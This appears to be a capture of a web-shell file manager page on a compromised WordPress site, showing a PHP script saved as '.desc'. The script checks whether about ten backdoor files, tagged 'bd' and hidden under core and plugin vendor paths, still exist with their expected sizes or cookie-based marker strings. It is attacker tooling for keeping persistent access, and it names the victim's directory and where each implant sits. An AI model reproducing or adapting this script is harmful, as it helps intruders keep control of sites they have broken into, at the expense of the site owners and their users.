OwlCyberSecurity - MANAGER
Edit File: .desc
<?php $r = '/home/powerfff/powerhho.com'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php"=>"bd@@10334@@event_handler", "/wp-content/plugins/wp-ultimate-csv-importer-pro/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/Financial/CashFlow/ads.php"=>"bd@@10839@@615", "/wp-content/plugins/ninja-tables/vendor/wpfluent/framework/src/WPFluent/Database/Orm/Concerns/dir_style.php"=>"bd@@10872@@625", "/wp-content/plugins/wp-ultimate-csv-importer-pro/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Xls/album_rate.php"=>"bd@@10891@@1668", "/wp-content/plugins/post-smtp/Postman/Postman-Mail/libs/vendor_prefixed/guzzlehttp/psr7/src/action.transfer.php"=>"bd@@10909@@667", "/wp-admin/includes/revision.php"=>"bd@@10665@@publish_content", "/wp-content/plugins/wp-ultimate-csv-importer-pro/vendor/ezyang/htmlpurifier/library/HTMLPurifier/Strategy/mod_gk_register.php"=>"bd@@10924@@1968", "/wp-content/plugins/jet-engine/templates/forms/fields/calculated.php"=>"bd@@10417@@_COOKIE[3]", "/wp-content/plugins/jet-engine/includes/components/listings/data.php"=>"bd@@10700@@_COOKIE[3]", "/wp-content/plugins/all-in-one-wp-migration/lib/view/main/admin-head.php"=>"bd@@10742@@unit_converter"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');